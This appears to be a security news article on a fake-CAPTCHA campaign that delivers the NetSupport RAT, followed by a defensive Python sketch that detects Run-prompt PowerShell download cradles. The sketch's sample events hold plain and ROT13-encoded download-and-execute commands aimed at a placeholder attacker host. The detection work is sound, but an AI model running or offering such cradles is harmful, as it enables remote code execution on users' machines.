Threat actors are abusing “Prove You Are Human” CAPTCHA pages to deliver malware to unsuspecting users. The recently identified campaign relies on spoofed websites that closely imitate legitimate platforms, among them Gitcodes and the DocuSign service, and are built to trick visitors into running malicious PowerShell scripts on their Windows machines. The multi-stage attack ends with the installation of the NetSupport Remote Access Trojan, a tool cybercriminals frequently abuse for unauthorized remote access and control. It typically begins with the user being lured to a fraudulent site that presents a seemingly innocuous CAPTCHA-style challenge requiring script execution.
These CAPTCHA challenges typically prompt users to copy a provided script and then paste it into the Windows Run prompt for execution.
This initial script, often hosted on platforms such as Gitcodes, acts mainly as a downloader for the later stages: it fetches further scripts from attacker-controlled domains such as tradingviewtool[.]com, starting a more elaborate infection chain on the system. Through a carefully orchestrated series of web requests the attack advances through several distinct stages, each script retrieving the next component, and culminates in full deployment of the NetSupport RAT, which gives the attackers a persistent backdoor. Persistence is commonly achieved by placing the malware in the Windows Registry’s Run key or in the user’s Startup folder.
In the DocuSign spoofing variant, the attackers use clipboard poisoning against their targets. A ROT13-encoded script is copied to the victim’s clipboard as soon as they interact with a fake CAPTCHA checkbox, and the page then instructs them to paste and run it via Win+R. Doing so triggers the download of further payloads, such as wbdims.exe from GitHub or jp2launcher.exe from zipped archives. These downloaded scripts then communicate with command-and-control servers, fetching additional malware and refreshing browser pages to deepen the infection. The multi-layered approach is intended to evade detection by splitting the attack into smaller, less conspicuous steps.
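As an added defender-side illustration (not code from the article or the researchers it cites), the following Python sketch flags the footprint this lure leaves in process-creation telemetry: a shell spawned by explorer.exe, as Win+R launches are, whose command line carries a download cradle either in the clear or under the ROT13 encoding used in the DocuSign variant. The event records and the EXAMPLE-ATTACKER.invalid domain are constructed for the demonstration.

```python
import codecs
import re
# Constructed Sysmon-style process-creation records, not telemetry from the
# campaign; EXAMPLE-ATTACKER.invalid is a placeholder, not a real domain.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr 'https://EXAMPLE-ATTACKER.invalid/s1')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # DocuSign variant: the clipboard script is ROT13-encoded, so the pasted
     # command line carries no readable download keyword.
     "CommandLine": "powershell -c \"" + codecs.encode(
         "IEX (New-Object Net.WebClient).DownloadString('https://EXAMPLE-ATTACKER.invalid/s2')",
         "rot_13") + "\""},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File build.ps1"},  # benign developer use
]

# Download-and-execute keywords typical of a first-stage downloader.
CRADLE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|"
                    r"downloadstring|downloadfile|start-bitstransfer)\b", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def is_run_prompt_launch(ev):
    # Commands typed into Win+R are spawned by explorer.exe, so a shell with
    # that parent is the footprint this lure leaves in process telemetry.
    return basename(ev["ParentImage"]) == "explorer.exe" and basename(ev["Image"]) in SHELLS

def find_cradle(cmdline):
    """Return (encoding, keyword) for the first cradle keyword in the raw
    command line or its ROT13 decoding; None if neither matches."""
    for encoding, text in (("plain", cmdline), ("rot13", codecs.decode(cmdline, "rot_13"))):
        m = CRADLE.search(text)
        if m:
            return encoding, m.group(1).lower()
    return None

def classify(events):
    """Flag Win+R-launched shells whose command line carries a download cradle."""
    hits = []
    for ev in events:
        found = is_run_prompt_launch(ev) and find_cradle(ev["CommandLine"])
        if found:
            hits.append((basename(ev["Image"]),) + found)
    return hits
```

The same explorer.exe-parent condition can be expressed as a Sysmon or EDR rule; the ROT13 pass is what keeps the encoded variant from slipping past a plain keyword match.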
Attribution for the campaign remains unclear, but patterns in domain registration and payload reuse suggest possible overlaps with known threat groups such as SocGholish, or with other criminal actors including FIN7 and STORM-0408. The campaign’s effectiveness rests on exploiting users’ trust in familiar online verification interactions. Security researchers urge vigilance: legitimate websites very rarely ask users to execute scripts directly. Verifying website URLs, checking SSL certificates, and refusing to paste unverified clipboard content are key mitigations, and the campaign underscores the continuing need for user education against evolving social engineering attacks.